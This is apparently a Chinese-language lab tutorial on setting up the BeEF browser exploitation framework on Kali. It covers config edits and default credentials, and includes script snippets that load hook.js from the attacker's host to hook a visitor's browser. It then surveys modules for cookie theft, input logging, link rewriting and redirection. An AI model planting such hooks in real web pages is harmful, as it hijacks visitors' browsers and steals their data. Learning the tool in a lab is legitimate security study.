基础配置

先修改配置文件

1
/usr/share/beef-xss/config.yaml

修改ip地址为kali的ip地址

1
2
3
4
5
# HTTP server
http:
debug: false #Thin::Logging.debug, very verbose. Prints also full exception stack trace.
host: "192.168.110.140"
port: "3000"

启动

beef-xss

我这里打不开浏览器 去浏览器里手动输入

1
http://192.168.110.140:3000/ui/panel

默认账号密码beef beef

beef有两个默认的hook页面,

1
2
3
默认hook js:http://192.168.110.140:3000/hook.js

默认hook页面: http://192.168.110.140:3000/demos/basic.html   //访问即可被hook

里面主要有这么一段代码

1
2
3
4
<script>
var commandModuleStr = '<script src="' + window.location.protocol + '//' + window.location.host + '/hook.js" type="text/javascript"><\/script>';
document.write(commandModuleStr);
</script>

测试

1
2
3
4
5
<html>
  <head>
    <script src="http://192.168.110.140:3000/hook.js"></script>
  </head>
</html>

beef就会收到请求 并且钩住

看一下beef界面的功能

image

先看左边

在线主机 和 不在线主机

再看右边

Deteils 浏览器信息详情,我看着就是请求头

Logs 记录浏览器的操作,点击,输入都能记录

Commands 重点模块,可以对浏览器执行的操作

commands模块又包括许多小模块

image

1
2


Browser

浏览器模块 里面还包括一个hook domain模块 可以

get cookie

替换<a>标签内的href值

重定向等等

image

Social Engineering

社工模块